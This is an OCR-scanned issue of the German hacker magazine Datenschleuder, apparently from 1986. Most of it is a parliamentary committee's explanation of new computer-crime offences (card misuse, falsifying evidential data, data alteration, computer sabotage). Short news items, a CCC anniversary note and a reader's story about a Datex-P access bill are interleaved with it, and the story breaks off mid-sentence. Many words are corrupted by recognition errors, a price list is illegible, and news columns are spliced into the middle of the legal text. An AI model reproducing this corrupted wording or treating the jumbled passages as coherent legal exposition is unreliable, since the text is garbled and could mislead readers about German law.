lassung der Karte verbunden ist, beschrieben. Zah¬ 
lung ist dabei'nicht nur im rem technischen Sinne 
eis Hingabe von Bargeld zu verstehen, sondern 
auch als Geldleistung im Verrechnungswege. Die 
Begriffe Scheck- und Kreditkarte haben im Wirt¬ 
schaftsleben einen so feststehenden Bedeutungsin¬ 
halt, daß sie als Tatbestandsmerkmale ausreichend 
bestimmt sind, zumal auf die ihnen notwendiger¬ 
weise zukommende Garantiefunktion Bezug ge¬ 
nommen wird. 

Die mit der Überlassung der Scheck- oder Kredit¬ 
karte eingeräumte Möglichkeit muß der Täter „mi߬ 
brauchen“. Das Mißbrauchsmerkmal entspricht 
dem des | 266 Abs. 1 1. Alternative StGB. Der Täler 
hält sich dabo nach außen im Rahmen seines 
rechtlichen KÖruiens, überschreitet aber im Innen¬ 
verhältnis zu dem Kartenherausgeber die Grenzen 
seines rechtlichen Dürfens. Mißbrauch der Scheck¬ 
karte liegt z. B. Immer dann vor, wenn der Täter 
einen Scheck hingibt dessen Einlösung zwar von 
Einern Kreditinstitut garantiert ist für den auf sei¬ 
nem Konto aber keine Deckung oder kein ausrei¬ 
chender Kredit vorhanden ist Bei der Kreditkarte 
liegt ein Mißbrauch z. B. dann vor. wenn der Täter 
mit der Verwendung der Karte gegen seine aus dem 
Kreditkartenvertrag resultierenden Pflichten ver¬ 
stößt, iiwbesondere, wenn er Verpflichtungen ein¬ 
geht obwohl die Einkommens- und Vermbgensver- 
hältnisse den KontoausgJeich nicht gestatten oder 
er selber nicht für ausreichende Deckung Sorge ge¬ 
tragen hat 

Wie bei § 266 StGB setzt das Mißbrauchsmerkmal 
weder generell voraus, daß dem Karteninhaber für 
einzelne Geschäfte ein Limit gesetzt ist (so in sei¬ 
ner Wirkung die Scheckkartengarantie), noch daß 
ein zeitabhängiger (etwa monatlicher) Höchstrah¬ 
men vorgeschrieben wird, noch daß eine absolute 
Kreditobergrenze vereinbart ist Anderenfalls wä¬ 
ren Verhaltensweisen, über die der Bundesgerichts¬ 
hof jüngst zu entscheiden hatte, weiterhin straflos. 

Der Mißbrauch der Kreditkarte muß schließlich zu 
einer Schädigung des Kartenherausgebers führen. 
Damit soll die Parallele zum Betrugs- und Untxeue- 
tatbestand gewahrt v^rden, da durch den neuen 
Tatbestand lediglich eine Lücke geschlossen wer¬ 
den soll, die bei der Anwendung dieser Bestimmun¬ 
gen offenbar wurde. Es muß sich daher bei dem 
Schaden um einen Vermögensschaden bandeln. 
Das Schadenserfordemis engt darüber hinaus das 



Mißbrauchsmerkmal weiter ein. Ist der Täter an¬ 
derweitig bereit und in der Lage, die Überziehung 
sofort oder jedenfalls unverzüglich auszugleichen, 
so liegt ein Schaden ebenso wie beim Untreuetat¬ 
bestand, der dem neuen Tatbestand in diesem 
Punkt entspricht — nicht vor. Unter diesen Voraus¬ 
setzungen wird auch der neue Tatbestand des 
Scbeckkortenmlßbrauchs nicht anzuwenden sein, 
wenn der Täter gelegentlich sein Konto durch Be¬ 
gebung von Schecks über die ihm eingeräumte Kre- 
ditgreoze hinaus belastet 

Der Täter muß vorsätzlich handeln, der Vorsatz 
muß sich auf sämtliche Tatbestandsmerkmale be¬ 
ziehen. Derjenige, der bei Scheckausstellung oder 
Verwendung der Kreditkarte noch nicht weiß, daß 
er seinen Verpflichtungen später nicht wird nach- 
kommen können, kann daher auch nach dem neuen 
Tatbestand nicht bestraft werden. Darüber hinaus 
handelt auch derjenige unter Umständen noch 
nicht vorsätzlich, der zwar von der Deckungslosig- 
keit seines Kontos bei Begebung des garantierten 

Schecks weiß, aber mit Vermögensausgleich in kür¬ 
zester Zeit rechnet 

Absatz 2 erklärt entsprechend §266 Abs.2 StGB 
§246a (Antragserfordemis bei geringem Schaden) 
für entsprechend anwendbar. 

Zu Artikel X Nr. 6 — § 269 StGB — Fälschung 
beweiserhebiieher Daten 

Die Einführung eines besonderen Tatbestandes ge¬ 
gen die Fälschung beweiserheblicher Daten wird 

vom Ausschuß für notwendig erachtet. Dafür sind 
die bereits im Regierungsentwurf, in der öffentli¬ 
chen Anhörung sowie in den Ausschußberatungen 
vorgebrachten Gesichtspunkte maßgebend. Vom 
Tatbestand der Urkundenfälschung werden unbe¬ 
fugte Eingaben z. B. von Computerdaten bzw. unbe¬ 
fugte Veränderungen von bereits gespeicherten Da¬ 
ten, die, wenn sie in ein Schriftstück aufgenommen 
wären, eine Urkundenfälschung darstellen würden, 
mangels Erkennbarkeit der Erklärung nicht erfaßt 
Für die Anwendung des §287 StGB reicht die 
leichte Einsehbarkeit in Dateien über Bildschirm- 
terminals alleine nicht aus. Die Urkundeneigen- 
schaft kann auch mangels Ausstcllerangabe entfal¬ 
len. Solchen Daten fehlt daher die von §267 StGB 
vorausgesetzte Urkundenqualität. Der Straftatbe¬ 
stand des §268 StGB (Fälschung technischer Auf¬ 
zeichnungen) erfaßt nur Teilbereiche. Ohne eine Er¬ 
gänzung des Strafrechts würde daher die Umstel¬ 
lung verwaltungsmäßigen Handelns auf die Daten¬ 
verarbeitung den bisher bei Schriftstücken beste¬ 
henden strafrechtlichen Urkundenschutz unge¬ 
rechtfertigt verkürzen. Bei den Verwendungsmög¬ 
lichkeiten der Datenverarbeitung reicht für einen 
wirksamen Schutz axich die Tatsache nicht aus, daß 
Verarbeitungen zu- Computerausdrucken führen 
können, denen Urkundenqualität beizumessen ist 
und die bei (mittelbarer) Vornahme, z. B. von Einga¬ 
ben oder nachträglichen Veränderungen durch 
nicht Berechtigte, deshalb als Urkundenfälschung 
i. S. von § 267 StGB qualifiziert werden können. In 
vielen Fällen werden entscheidungserhebliche Da¬ 
ten direkt aus dem Computer zur (maschinellen) 
Weiterverarbeitung benut^ wie dies besonders im 
Bank-, Rechnungs- und Zahlungsverkehr deutlich 
wird. 




-f. ,Jtacfce^Manövel‘ 
^ inParis 


oc Eine «NachtderHacksr" isi in der 
r vergjngcnen Woche von der Pari- 
^ verZeilung'LeMonde'organisiert 
i- worden. Zehn luigc Inrormaiifc- 


fans.sobenchlei 'Le Monde' jetzt, 
«icien unter der Aufsicht von drei 
Experten zwischen Mitternacht 
und Stehen Uhr am frühen Morgen 


tnzwanziggroRe Datenbanken Es- 
ropas und der USA eingedrungen 
- so in die des britischen Veneidi- 
gungiministeriums. 


Aus ähnlichen Erwägungen wie beim Computerbe¬ 
trug hat sich der Ausschuß gegen den Vorschlag 
von Haft in der öffentlichen Anhörung (Prot Nr. 26, 
S. 164, AnL S. 201) ausgesprochen, sich einer blo¬ 
ßen Ergänzung des § 267 StGB zu begnügen („Ge- 
dankenerkl&nmgen können auch dann Urkunden 
sein, wenn sie computerlesbar gespeichert sind“). 
Eine sich nxir auf eine Ergänzxmg des Urkunden¬ 
begriffs. sei es in § 267 StGB oder in allen Urkun¬ 
denstraftatbeständen, beziehende Gleichstellungs¬ 
vorschriftwürde andere Tatbestandsmerkmale un¬ 
angetastet lassen. Dies würde zu einer unklaren 
^. inH wenig anschaxilichen Tatbestandsumschrei¬ 
bung führen (.Wer ... unechte computerlesbar 
gespeicherte Gedankenerklärungen ... {bzw. Da¬ 
ten ...] speichert...), die dem Ausschuß nicht ak¬ 
zeptabel erscheint 

Im Hinblick auf die in Absatz 1 gegenüber den Ent¬ 
würfen vorgeschlagene Erweiterung des Tatbestan¬ 
des wurde die Überschrift geändert 

Absatz 1 wurde seinem Inhalt und seiner Ausgestal¬ 
tung nach nicht unwesentlich umgestaltet Entspre¬ 
chend der PrüfuDgsempfehlung des Bundesrates 
stellt die Neufassung sicher, daß die der Herstel¬ 
lung einer unechten Urkunde entsprechende unzu¬ 
lässige Speicherung beweiserheblicher Daten dem 
Tatbestand unterfäUt Dem dazu vorgelegten For¬ 
mulierungsvorschlag der Bundesregierung in ihrer 

Gegenäu3ei\ing zu der Stellungnahme des Bundes¬ 
rates ist der Ausschuß allerdings nicht gefolgt Ma߬ 
gebend dafür war, daß dort zur Abgrenzung von 
strafbarem und stzaBosem Verhalten u.a. weiter 
auf ^unbefugtes“ Handeln abgestellt wird, dieser 
Begi^ jedo^ in seiner Bedeutung nicht völlig klar 
ist Darauf hat Haft in der öffentlichen Anhörung zu 
Hecht hingewiesen (Prot Nr. 26, Anl. S.210). Die 
einengende Auslegung, die der Regierungsentwurf 
diesem Merkmal beilegt kann im Hinblick auf eine 
weiterreichende Bedeutung dieses Merkmals in an¬ 
deren Strafvorschriften nicht als gesichert betrach¬ 
tet werden. Um zu vermeiden, daß von der neuen 
Strafvorschrift Verhaltensweisen erfaßt werden, die 
bei ihrer Vornahme im Zusammenhang mit der 
Herstellung oder Veränderung eines Schriftstücks 
niir eine sog. straflose schriftliche Lüge darstellen, 
hat der Ausschuß die Vorschrift neu gestaltet Ent¬ 
scheidend ist daß Daten so (nicht unmittelbar 
wahrnehmbar) gespeichert oder verändert werden, 
daß sie, %venn sie als ausgedruckt oder wiedergege¬ 
ben wahrnehmbar wären, eine Urkundenfälschimg 
i. S. des § 267 StGB darstellen würden. Mit dieser 
‘Ausgestaltung wird auch dem Anliegen von Haft, 
den Tatbestand nicht von der Garantiefunktion, der 
Aussteuererkennbarkeit zu lösen (Prot Nr. 26, 
S. 168, Ani S. 209 f.), Rechnung getragen. Durch die 
Konstruktion eines hypothetischen Vergleichs mit 
Fällen der Urkundenfälschimg i. S. des § 267 StGB 
war es auch nicht mehr notwendig, besonders her¬ 
vorzuheben, daß vom Tatbestand .cur solche Daten 
erfaßt werden, „die dazu bestimmt sind, bei einer 
Verarbeitung im Rechtsverkehr als Beweisdaten 
für rechtlich erhebliche Tatsachen benutzt zu wer¬ 
den“ (so die Formulierung der Entwürfe). Der Zu¬ 
satz „beweiserheblich“ gibt in verkürzter Form 




diese Auslegung wieder. Aus der den Tatbestand 
des § 267 StGB ergänzenden Funktion des § 269 
StGB wie aus seiner Ausgestaltung ergibt sich, daß 
nur solche beweiserbeblichen Daten betroffen sind, 
die ^elektronisch, magnetisch oder sonst nicht un¬ 
mittelbar wahrnehmbar“ gespeichert werden bzw. 
bei Tatbegehtuig ^hon entsprechend gespeichert 
waren. Wie bei § 263 a StGB wurde auf eine Verwei¬ 
sung auf §202a Abs. 2 StGB abgesehen, da §266 
StGB auch Fälle erfaßt, in denen Daten eingegeben 
werden, also nicht nur an bereits gespeicherten Da¬ 
ten Veränderungen vorgenommen werden (so noch 
die Entwürfe). 

Die Absätze 2 und 3 wurden unverändert übernom¬ 
men. 

§ 270 StGB — Täuschung im Rechtsverkehr bei Da¬ 
tenverarbeitung — 

unverändert 


Zu Artikel 1 Nr. 7 und 8 — §§ 271.273 StGB — 
unverändert 

Zu Artikel 1 Nr. 9 — § 274 StGB — 

Die Vorschrift wurde inhaltlich im wesentlichen un¬ 
verändert übernommen. Die Änderungerr und Er¬ 
gänzungen sind Folgeändenmgen. Der Begriff Da¬ 
ten wird durch Bezugnahme auf § 202 a Abs. 2 StGB 
io Artikel 1 Nr. 2 b eingegrenzt. Die Verwendung 
des Merkmals „beweiserheblich“ ersetzt die Verwei¬ 
sung auf § 266 StGB. Es ist wie dort zu verstehen 
(vgL die Begründung zu Artikel 1 Nr. 6 §269 

StGB —). Die Ergänzung der Tathandlungen dient 
der Angleichung an § 303 a StGB (Datenverände¬ 
rung) in Artikel l Nr. 9 b (vgL die dortigen Erläute¬ 
rungen). Sie verdeutlicht den in der höheren Straf¬ 
drohung sich auswirkenden Vorrang der Nummer 2 
gegenüber §303a StGB. Auch Tathandlungen, die 
dem „Beschädigten“ in § 274 Abs. 1 Nr. 1 StGB ent¬ 
sprechen. werden nunmehr ausdrücklich erfaßt 

Zu Artikel 1 Nr.9a und 9b — § 303 Abs.3, §§ 303a, 
303 b. 303 c StGB — 

§ 303 a StGB — Datenveronderung — 

Der Ausschuß schlägt die Aufnahme eines in den 
Entwürfen nicht enthaiteneo Tatbestandes gegen 
„Datenveränderung“ vor. Als Daten dargestellte In¬ 
formationen sollen dagegen geschützt werden, daß 
ihre Verwendbarkeit beeinträchtigt oder beseitigt 
wird. Computerdaten können «inen hohen wirt¬ 
schaftlichen Wert haben. Auf Grund der wachsen¬ 
den Abhängigkeit von ihnen in V^rtschaft und Ver¬ 
waltung und ihrer starken Komprimierung ist ein 
zusätzlicher strafrechtlicher Schutz erforderlich. 
Aufgegriffen werden damit Aaregungen aus der öf¬ 
fentlichen Anhörung (vgL Mohr und OerteL Prot 
Nr. 26 S. 180, 183t; Anl. S. 38£f„ 218t). Sieber (Prot 
S. 177) sah zwar im Moment keine spezifischen Re- 
formt^ürfnisse, wies aber selber auf eine mögliche 
Zunahme solcher Delikte hin (Prot S. 172). Auch 


ausländische Staaten haben vergleichbare Regelun¬ 
gen (USA, Kanada) oder planen solche (Österreich, 
Schweiz). Das geltende Eiecht reicht nicht aus. Die 
Anwendbarkeit des § 303 StGB (Sachbeschädigung) 
ist umstritten imd zumindest nicht in allen Fallge- 
staltungen gesichert (zweifelnd z. R OerteL Prot 
S. 183 f„ 160). Das Vernichten oder Veiündem von 
Daten während der Übermittlungsphase wird z. B. 
von § 303 StGB nicht erfaßt 

Der vorgeschlagene Tatbestand lehnt sich in seiner 
Ausgestaltung weitgehend an«§ 303 StGB an. Durch 
Aufnahme verschiedener, sich teilweise überschnei¬ 
dender Tathandlungen soll erreicht werden, daß 
alle rechtswidrigen Beeinträchtigungen der Ver¬ 
wendbarkeit von Daten erfaßt werden. Dabei kann 
sich die Rechtswidrigkeit sowohl aus der Verlet¬ 
zung des Verfügungsrechts des Speichernden als 
auch aus der Verletzung von Interessen des vom 
Inhalt der Daten Betroffenen (vgL §41 BDSG) erge¬ 
ben. 


Absatz 1 

Handlungsobjekt sind alle nicht unmittelbar wahr¬ 
nehmbaren Daten t. S. des § 202 a Abs. 2 StGB. Das 
„Löschen“ von Daten, das dem Zerstören einer 
Sache in § 303 StGB entspricht, macht diese unwie¬ 
derbringlich vollständig unkenntlich (vgL § 2 Abs. t 
Nr. 4 BDSG). Ein „Unterdrücken“ von Daten liegt 

vor, wenn diese dem Zugriff Berechtigter entzogen 
und deshalb nicht mehr verwendet werden können; 
insoweit geht § 303 a StGB über § 303 StGB hinaus. 
„Unbrauchbar“ sind Daten, wenn sie (z. B. durch zu¬ 
sätzliche Einfügungen, so Sieber in der veröffent¬ 
lichten erweiterten Fassimg seines Gutachtens) so 
in ihrer Gebrauebsfähigkeit beeinträchtigt werden, 
daß sie nicht mehr ordnungsgemäß verwendet wer¬ 
den können und damit ihren Zweck nicht mehr 
erfüllen können. Das „Verändern“ von Daten erfaßt 
Funktionsbeeinträchtigungen wie das in § 2 Abs. I 
Nr. 3 BDSG genannte inhaltliche Umgestalten, 
durch das ihr Informationsgehalt bzw. Aussagewert 
geändert wird. 

Absatz 2 

In Parallele zu § 303 StGB wird auch der Versuch 
für strafbar erklärt 

§ 303 b StGB — Computersabotage — 

Der Ausschuß schlägt die Aufnahme eines in den 
Entwürfen nicht enthaltenen Tatbestandes gegen 
„Computersebotage“ vor. der Störungen der Daten¬ 
verarbeitung in Wirtschaft txnd Verwaltung durch 
Eingriffe in Daten oder Sabotagehandlungen gegen 
Datenträger oder Datenverarbeitungshandlungen 
dann unter Strafe stellt, wenn die gestörte Daten¬ 
verarbeitung für den Geschädigten von wesentli¬ 
cher Bedeutung ist Die zunehmende Bedeutung 
und Abhängigkeit von Wirtschaft und Verwaltung 
von einem störungsfreien Funktionieren der Daten¬ 
verarbeitung, insbesondere in Rechenzentren, 
rechtfertigt die Einführung eines Tatbestandes ge¬ 
gen eine besonders gefährliche Form der Wirt¬ 



schaftssabotage. Werden z. B. Buchführung und 
Lohnabrechnung in Rechenzentren lahmgelegt, so 
kann dies nicht nur zum wirtschaftlichen Ruin des 
Rechenzentrumsbetreibers. sondern auch der mit 
diesem zusammenarbeitenden Unternehmen füh¬ 
ren (Mohr, DATEV, Prot Nr. 26, S. 181). Dabei ist 
auch auf die Möglichkeit des unbefugten Eindrin¬ 
gens Außenstehender hinzuweisen, die u- U. auch zu 
erhebtichen Störungen führen kann. 

In der öffentlichen Anhörung ist das geltende Recht 
(§ 303 StGB) und die in den Entwürfen vorgeschla¬ 
gene sich auf Beweisdaten beschränkende Ände¬ 
rung des §274 StGB als unzureichend kritisiert 
worden; dies gilt insbesondere für den Strafrahmen 
des § 303 StGB (vgL Mohr und OerteL Prot S. 179 ff„ 
182 ff.; Anl. S. 3eff„ 218 ff.), welchem derjenige des 
§ 303 a StGB entspricht (Freiheitsstrafe bis zu zwei 
Jahren). Mit diesen Tatbeständen kann den Auswir¬ 
kungen einer Computersabotage auf Unternehmen 
und Behörden (trote § 46 StGB) nicht hinreichend 
Rechnung getragen werden- Sieber (Prot S. 177) hat 
zwar im Moment kein sperifisches Reformbedürf¬ 
nis gesehen, aber selber eingeräumt daß bei Stö¬ 
rungen der Datenübertragung, bei Fehlbedienun- 
gen der Computerhardware und sonstigen Eingrif¬ 
fen in betriebliche Abläufe der Tatbestand der 
Sachbeschädigung bei der Erfassung der Betriebs¬ 
sabotage auf Schwierigkeiten stoßt (Prot AnL 
S. 272). 

Bei der Entscheidung für einen Sondertatbestand 
der Computersabotage hat der Ausschuß die Forde¬ 
rungen nach einem weitergebenden strafrechtli¬ 
chen Schutz hochwertiger Wirtschafts- und Indu¬ 
striegüter vor Sabotage durch einen Straftatbe¬ 
stand gegen Betriebssabotage nicht übersehen. Ab¬ 
gesehen von der Schwierigkeit, einen praktikablen 
und ausreichend bestimmten Straftatbesland der 
Betriebssabotage zu bilden (vgl. auch den Hinweis 
von Sieber. Prot Anl. S.273), ist nach Ansicht des 
Ausschusses dos derzeitige Bedürfnis für die Bil¬ 
dung eines Sondertatbestandes der Computersabo- 
tage stärker als das für die Einführung eines allge¬ 
meinen Sabotagetatbestandes. 

Angesichte der bei schweren Fällen von Computer¬ 
sabotage leicht vorstellbaren hohen Schäden hält 
der Ausschuß es für notwendig, eine Höchststrafe 
von fünf Jahren Freiheitsstrafe vorzusehen. 


Im einzelnen ist folgendes zu bemerken: 


Absatz 1 

Strafbar macht sich, wer eine für einen fremden 
Betrieb, ein fremdes Unternehmen oder eine Be¬ 
hörde wesentliche Datenverarbeitung durch die in 
Nummern* 1 und 2 genannten konkreten Angriffs¬ 
handlungen stört Der Begriff „Datenverarbeitung" 
ist dabei weit auszulcgen. Er umfaßt nicht nur den 
einzelnen Datenverarbeitungsvorgang, sondern 
auch den weiteren Umgang mit Daten und deren 
Verwertung. Eingeschränkt wird der Tatbestand 
dadurch, daß die Datenverarbeitung „von wesentli¬ 
cher Bedeutung“ sein muß. Damit sind unter ande¬ 
rem Angriffe auf Daten (einschließlich ihrer Verar¬ 
beitung) erfaßt die in den ReAenzentren von Groß- 





unternehmen bzw. in Anlagen (einschlieOUch Da* 
tehträgem) gespeichert srnd, welche die für die 
Firnktionsfähigkeit von Unternehmen bzw. Behör¬ 
den zentralen Informationen enthalten. Sabotage¬ 
akte von untergeordneter Bedeutung fallen hier¬ 
durch bereits von vornherein nicht unter den Tatbe¬ 
stand; Beeinträchtigungen der Funktionsfähigkeit 
von elektronischen Schreibmaschinen oder Ta¬ 
schenrechnern werden dadurch ausgeschieden. Für 
die Anwendung des Tatbestandes ist eine bloße Ge¬ 
fährdung der Datenverarbeitung nicht ausreichend; 
vorliegen muß vielmehr eine nicht unerhebliche Be¬ 
einträchtigung des reibungslosen Ablaufs der ge¬ 
nannten wesentlichen Datenverarbeitung. Eine Stö¬ 
rung des Betriebes wie in § 316 b StGB wird jedoch 
nicht gefordert; eine ^ starke Einengung des Tat¬ 
bestandes soll dadurch vermieden werden. Nicht 
strafbar macht sich nach §303b StGB derjenige, 
welcher durch Handlungen nach Nummern 1 oder 2 
nur seine eigene Datenverarbeitung stört Greift er 
hierbei in fremde Rechte ein, kann er insoweit nach 
§ 303 bzw. 303 a StGB bestraft werden. 

Hinsichtlich der einzelnen Angriffsmittel unter¬ 
scheidet Absatz 1 zwischen verschiedenen Tatob- 
jektec. 

Nummer J nennt als Sabotagehandlung eine rechta- 
widrige Datenveränderung i. S. von § 303 a Abs. 1 

StGB. Eine Tat nach Absatz 1 Nr. L stellt insoweit 
eine Qualifikation zu § 303 a StGB dar. 


^ 303 .41)5. 3; ^ 303 c StGB — Strafantag_ 

Wie der bisherige § 303 StGB werden die §§ 303 a 
und 303 b StGB grundsätzlich als Antragsdelikt 
ausgestaltet. Ausnahmsweise kann in Fällen beson¬ 
deren öffentlichen Interesses ein Strafverfahren 
auch ohne Strafantrag durchgeführt werden. Die 
Identität der Regelung für die §§ 303 bis 303 b StGB 
hat den Ausschuß bewogen, diese im Anschluß 
daran in einen neuen § 303 c StGB aufzunehmen 
(vgl. als Parallele § 205 StGB). Die Aufhebung des 
§ 303 Abs. 3 StGB stellt dazu eine Folgeanderung 


Kurzmeldungen 


(Bild: Harald, aus taz] 

Atom-Kataster 

Ein störsichares StrahlungsmeBprogramm 
auf Heimcomputern wie VC20 und C64 fahren 
mehrere Bürgerinitiativen. Derzeit werden erst 
ein paar der bundesdeutschen Atomkraft¬ 
werke überwacht. 


Nummer 2 knüpft bei der Nennung weiterer an Da¬ 
tenverarbeitungsanlagen oder Datenträgern began¬ 
genen Sabotagehandlungen am Tatbestand der 
Sachbeschädigung (§303 StGB) und an Sabotage¬ 
straftatbestände des Strafgesetzbuches an (§ 87 
Abs. 2 Nr. 2; § 100 e Abs. 1: § 145 Abs. 2 Nr. 2; §§ 316 b, 
317), womit auch eine Angleichung an N umm er 1 
i. V. m. den in § 303 a StGB genannten Tathandlun¬ 
gen erfolgt Die Begriffe „Zerstören“ und „Beschädi¬ 
gen“ decken sich mit denen des § 303 StGB. Die 
genannten Gegenstände sind „beseitigt“, wenn sie 
aus dem Verfügungs- oder Gebrauchsbereich des 
Berechtigten entfernt sind. Sie sind „unbrauchbar", 
wenn ihre Gebrauchsfähigkeit so stark beeinträch¬ 
tigt wird, daß sie nicht mehr ordnungsgemäß ver¬ 
wendet werden können, und „verändert“, wenn ein 
vom bisherigen abweichender Zustand herbeige¬ 
führt wird. Der Ausschuß hat sich dafür entschie¬ 
den. die Nummer 2 nicht nur als qualifizierte Sach¬ 
beschädigung auszugestalten. Auch dann, wenn 
sich die einzelnen Tathandlungen gegen eigene 
Sachen richten, soll die Nummer 2 anwendbar sein, 
wenn dadurch die wesentliche Datenverarbeitung 
eines dem Täter nicht gehörenden Unternehmens 
oder einer Behörde gestört wird. Für die Nummer 1 
lassen sich ähnliche Ergebnisse durch eine entspre¬ 
chende Auslegimg des § 303 a StGB erreichen. 

Absatz 2 

Wie bei den §§ 303,303 a StGB und den Sabotagetat¬ 
beständen der §§ 316 b, 317 StGB wird der Versuch 

für strafbar erldärL 


Vor Tschernobyl wurden diese mit Computern 
arbeitenden Initiativen oft genauso argwöh¬ 
nisch betrachtet wie die Atomkraftwerke. Jetzt 
ist das Verhältnis entspannt. 

Als Hardware vor Ort dient ein VC20 mit Da- 
tasette, Drucker, Echtzeituhr, Netz- und Bat¬ 
teriebetrieb. 

Am Useroort hängen MeßfühlerfürWind, Wet¬ 
ter und Strahlung. 

Ein C64 bildet cfas örtliche Kleinarchiv, eine 
5209r Aufrüstung teils in Planung. 

Zum mobilen Meßkit gehört Kompaß mit Vi¬ 
siereinrichtung auf Kamerastativ: Kühlturm 
bekannten Formats anpeilen, dann Standort¬ 
bestimmung auf Meßtischblatt. 
Wettermessung ist eine wichtige Vorausset¬ 
zung für verläßliche Strahlungsdaten. Fein¬ 
mechaniker stellten benötigte Präzisionsteile 
bei befreundeten Firmen her. 

Der Batteriebetrieb ermöglicht nahezu stö¬ 
rungsfreien Betrieb auch bei Ausfällen des 
Stromnetzes. 

Meßdaten werden archiviert und bundesweit 
ausgewertet. 

Derzeit bilden sich an verschiedenen anderen 
Standorten der Kernspaltung in den Bürgeri¬ 
nitiativen weitere Meß-Initiativen mit dem Ziel, 
ein bundesweites öffentliches Atomkataster 
zu erstellen. (crd8606291700) 



VQC7,<?9 DM_ 

.*b 100 DM_ 

4,2.00 DM_ 

7.0,00 DM_ 

60,00 DM _ 


6in AOO bringt Unbekannte« öfter' 

(.eOPHsabo ds (wer nder wae lebt langer"" 
Fo'dorabc R Ausg.iben 

Jahr..?.,-,ho B A. Nor ma! v er cl i pner 

Sonderaho 0 A. NLIF< Sc hui er ci. a . ' ' ' 
SonaeraDD und HacIerhibol Teil 1 
daPE-daH0 jeweils inkl. Porto/Verp. 


(Bild umgesägter E-Mast) 

Stillstand nach Stromausfall 

“Sägende Sofortabschalter, die - abgesehen 
von der Gesetzeslage - teilweise ziemlich 
leichtsinnig Strommasten umlegen (immerhin 
AKW-Notabschalttest, dazu zehntausende 
Volt Schrittspannung) veranlaßten kürzlich 
einige Hamburger (Sroßrechenzentren, ihre 
Wiederanlauffähigkeit nach Kurzzeitstro¬ 
mausfall zu testen. Bei zumindest zwei Re¬ 
chenzentren erwies sich das System als ver- 
bessenjngsbedürftig. (crd860629l 702) 




RallaMcnitlIvns d«' •lll^tlieKan MeduIFvnVtiv 

Fün^ Jahr© Chaos - Ende o-f-fen 
Vor genau 5 Jahren (11./12. SeptefDber 
1981) -fand in Berlin das erste 
Treffen des CCC statt. "Mißtraut 
Aktentaschen und Kartons" war die 
Überschrift einer Berliner 

Tageszeitung damals. 

Seit Frühjahr 1984 gibt es die 
datenschleuder. Angefangen hat es mit 
vier Seiten A4, die jetzige Ausgabe 
umfaßt immerhin 16 Seiten. Die kleine 
Schrift (dichtgepackte Information) 
brachte Gerüchte, wir würden vom 
Optikerverband unterstützt. Das 

regelmäßige Erscheinen wurde trotz 
guter Vorsätze bisher nicht erreicht^ 
gelegentlich wurde die ds schon 
totgeglaubt. 

Eintreffende Briefe mit bösen 
Forderungen und Drohungen zB wegen 
"Nichtlieferung" von Abo usw. werden 
mit Verweis auf das Chaos und 
Rückerstattung beantwortet. Die ds 
erscheint öfter , wenn konstruktivere 
Textbeiträge hier eingehen. Wir tun 
unser bestes, auch wenn es manchen 
nicht reicht. Finanzielle Bereich¬ 
erung , wie Unwissende unterstellen, 
liegt nicht vor. Wir brauchen im 
Gegenteil Spenden. Es gibt kaum noch 
Zeitschriften, die nicht von Werbung 
abhängig sind. 

Oie datenschleuder ist von Lesern 
abhängig und freuen uns über Jede 
Uoterstützuna. ds-red. 


NUI OFF 

Welcher Kopplerbesltzar hat noch nicht mit dam Gedanken 

g sspieH sich auch einmal im Dalex P-Natz der Deut^hen 
undespost zu versuchen ?1 So auch ich. Also nichts wia ran 
ans Telefon, Fernmeldeamt angerufen und ein Antragsfor¬ 
mular für eine Network-User-Identifikatlon (NUI) beantragt. 
Nach zwei falschen Antragsformularen kam dann auch nach 
ca. 10 tagen daß heißersehnte Papier, Ausfüllen und wieder 
abschicken wurije auf der Stelle erledigt. Als die NUI dann 
nach einiger Zeit per Einschreiben zugestellt wurde, konnte 
ich es gar nicht abwanen den Rechner einzuschallen. Kurz 
nochmal die milgespeicherfe Datex P-Anleitung einer der 
Maifboxen 'durchgelesen, ein paar NUA’s (Network-User- 
Adress) aus derselben Mailbox notiert, und dann gings los. 
Doch was ist das ?? Da will doch dieser blöde Rechner, der 
in diesem Fall in England stand, auch noch einen Usarnamen 
und ein Passwort wissen. Nach einigen Fehlversuchen pro¬ 
bierteich es in den USA. aber die wollten ihre Daten auch nicht 
kostenlos herausgeben. Da stand ich nun mit meinem Latein 
und meiner NUI. Da meine Englischkenntnisse auch nicht 
gerade die eines Engländers waren, gab ich es erstmal wieder 
auf. Ich sagte mir. die 15 DM im Monat ward ich auch noch 
verkraften, vielleicht lern ich in Sachen Datex ja nochmal was 
dazu, und dann könnte ich die NUI sicher nochmal gebrau¬ 
chen. Als ich nun nach zwei Monaten immer noch keine 
Gebührenabrechnung vom Fernmeldeamt bekommen hatte, 
wunderte ich mich zwar, dachte mir aber nichts dabei. Der 
große Schock kam erst nach gut drei Monaten. Und zwar in 
Form einer Fernmelderachnung über 1090.13 DM. Da mußte 
ich erstmal schlucken. Als sich die ersten Schluckkrämpfe 
gelegt hatten rief ich natürlich sofort bei derFernmaiderech- 
nungsstelle an um die Rechnung überprüfen zu lassen. Die 
Dame am Telefon wusste allerdings nichts von so einer 
Rechnungssumme. Lediglich eine Summe von ca. 60.- DM sei 
ihr bekannt. Nun. das hörte sich ja schon ganz gim an, mit etwa 
so einer Summe hatte ich auch gerecnnel.Doch plötzlich 
verwandelte sich meine Erleichterung in die bekannten 
Schluckstörungen. Oie freundliche Dame teilte mir mit daß da 
nachträglich noch etwas 'von Hand’ auf meiner Rechnung 
geändert worden wäre (was immer das auch heißen mochte}. 
§ie verwies mich dann an die zuständige Stelle für Datex-P. 
Dia konnten mir aber leider auch nicht helfen, wollten aber, 
wenn ich gleich vorbeikommen würde, meine NUI noch am 
selben Tag sperren. Ich also hin, NUI zu sofort gekündigt und 
gefragt was ich denn nun machen könne. Man sagte mir daß 
man versuchen wollte die Gebühren zu überprüfen. Mit der 
Versicherung daß die NUI noch am gleichen Tag gesperrt 
würde fuhricn also wieder nach Hause. Als ich nach etwa einer 
Woche immer noch nichts vom Fernmeldeamt gehört halte 
kam mir Samstagnachmiltag beim Frühstücken der Gedanke 
mal den Pad anzurulen und die NUI auszuprobieren. Ich 
dachte mich tritt ein Pfard.:Teilnehmerkennung DTAMMANY 
aktiv III Daraufhin probierte ich natürlich noch mehrere Male 
und bekam bis Montagmorgen noch die Aktivmeldung. Auf 
den sofortigen Anruf beim Fernmeldeamt wurde mir geant¬ 
wortet daß man NUI's nur von Sonntag auf Montag sperren 
könne und am letzten Sonntag die dafür benötigten 'Spei¬ 
cherplätze' schon belegt gewesen wären.... Nach ca. vier 
Wocnen bekam Ich dann einen Anruf vom Fernmeldeamt in 
dem man mir rttitteille daß mir die Gebührenaufstatlung die ich 
